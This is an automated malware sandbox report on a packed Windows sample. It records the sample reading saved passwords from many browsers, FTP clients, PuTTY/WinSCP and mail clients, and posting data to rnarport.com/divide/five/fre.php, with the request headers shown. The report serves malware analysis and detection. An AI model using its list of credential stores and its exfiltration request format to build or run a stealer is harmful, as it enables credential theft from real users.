| registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
| registry | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox |
| section | CODE |
| section | DATA |
| section | BSS |
| packer | BobSoft Mini Delphi -> BoB / BobSoft |
| suspicious_features | POST method with no referer header, HTTP version 1.0 used | suspicious_request | POST http://rnarport.com/divide/five/fre.php | ||||||
| request | POST http://rnarport.com/divide/five/fre.php |
| request | POST http://rnarport.com/divide/five/fre.php |
| file | C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Login Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\Login Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\Default\Login Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Local\Chromium\User Data\Default\Login Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Local\Chromium\User Data\Default\Web Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\LocalMapleStudio\ChromePlus\Login Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\LocalMapleStudio\ChromePlus\Default\Login Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Local\Nichrome\User Data\Default\Web Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Local\Nichrome\User Data\Default\Login Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Local\RockMelt\User Data\Default\Web Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Local\RockMelt\User Data\Default\Login Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data |
| registry | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey |
| registry | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox |
| entropy | 7.502487179934397 | section | {'size_of_data': '0x0000ba00', 'virtual_address': '0x00073000', 'entropy': 7.502487179934397, 'name': 'DATA', 'virtual_size': '0x0000b9ec'} | description | A section with a high entropy has been found | |||||||||
| entropy | 7.194260871099589 | section | {'size_of_data': '0x00025000', 'virtual_address': '0x0008d000', 'entropy': 7.194260871099589, 'name': '.rsrc', 'virtual_size': '0x00024f8c'} | description | A section with a high entropy has been found | |||||||||
| entropy | 0.2822931785195936 | description | Overall entropy of this PE file is high | |||||||||||
| host | 172.217.24.14 | |||
| file | C:\Program Files (x86)\FTPGetter\Profile\servers.xml |
| file | C:\Users\Administrator.Oskar-PC\AppData\Roaming\FTPGetter\servers.xml |
| file | C:\Users\Administrator.Oskar-PC\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat |
| file | C:\Users\Administrator.Oskar-PC\AppData\Roaming\wcx_ftp.ini |
| file | C:\Windows\wcx_ftp.ini |
| file | C:\Users\Administrator.Oskar-PC\AppData\Roaming\GHISLER\wcx_ftp.ini |
| file | C:\Users\Administrator.Oskar-PC\wcx_ftp.ini |
| file | C:\Windows\32BitFtp.ini |
| file | C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\sitemanager.xml |
| file | C:\Program Files (x86)\FileZilla\Filezilla.xml |
| file | C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\filezilla.xml |
| file | C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\recentservers.xml |
| registry | HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts |
| registry | HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts |
| registry | HKEY_CURRENT_USER\Software\Ghisler\Total Commander |
| registry | HKEY_CURRENT_USER\Software\VanDyke\SecureFX |
| registry | HKEY_CURRENT_USER\Software\LinasFTP\Site Manager |
| registry | HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings |
| registry | HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions |
| registry | HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions |
| registry | HKEY_CURRENT_USER\Software\Martin Prikryl |
| registry | HKEY_LOCAL_MACHINE\Software\Martin Prikryl |
| file | C:\Users\Administrator.Oskar-PC\AppData\Roaming\.purple\accounts.xml |
| registry | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook |
| registry | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird |
| registry | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
| dead_host | 172.217.24.14:443 |
| dead_host | 172.217.27.142:443 |
No hosts contacted.
| Source | Source Port | Destination | Destination Port |
|---|---|---|---|
| 192.168.56.101 | 49179 | 204.11.56.48 rnarport.com | 80 |
| 192.168.56.101 | 49181 | 204.11.56.48 rnarport.com | 80 |
| 192.168.56.101 | 49182 | 204.11.56.48 rnarport.com | 80 |
| Source | Source Port | Destination | Destination Port |
|---|---|---|---|
| 192.168.56.101 | 49235 | 114.114.114.114 | 53 |
| 192.168.56.101 | 49713 | 114.114.114.114 | 53 |
| 192.168.56.101 | 51963 | 114.114.114.114 | 53 |
| 192.168.56.101 | 53380 | 114.114.114.114 | 53 |
| 192.168.56.101 | 53657 | 114.114.114.114 | 53 |
| 192.168.56.101 | 55368 | 114.114.114.114 | 53 |
| 192.168.56.101 | 60215 | 114.114.114.114 | 53 |
| 192.168.56.101 | 137 | 192.168.56.255 | 137 |
| 192.168.56.101 | 138 | 192.168.56.255 | 138 |
| 192.168.56.101 | 123 | 20.189.79.72 time.windows.com | 123 |
| 192.168.56.101 | 50002 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 50534 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 50568 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 51808 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 56539 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 56804 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 57236 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 57756 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 57874 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 60123 | 224.0.0.252 | 5355 |
| URI | Data |
|---|---|
| http://rnarport.com/divide/five/fre.php | POST /divide/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rnarport.com Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4F84A20 Content-Length: 196 Connection: close |
| http://rnarport.com/divide/five/fre.php | POST /divide/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rnarport.com Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4F84A20 Content-Length: 169 Connection: close |
No ICMP traffic performed.
No IRC requests performed.
No Suricata Alerts
No Suricata TLS
No Snort Alerts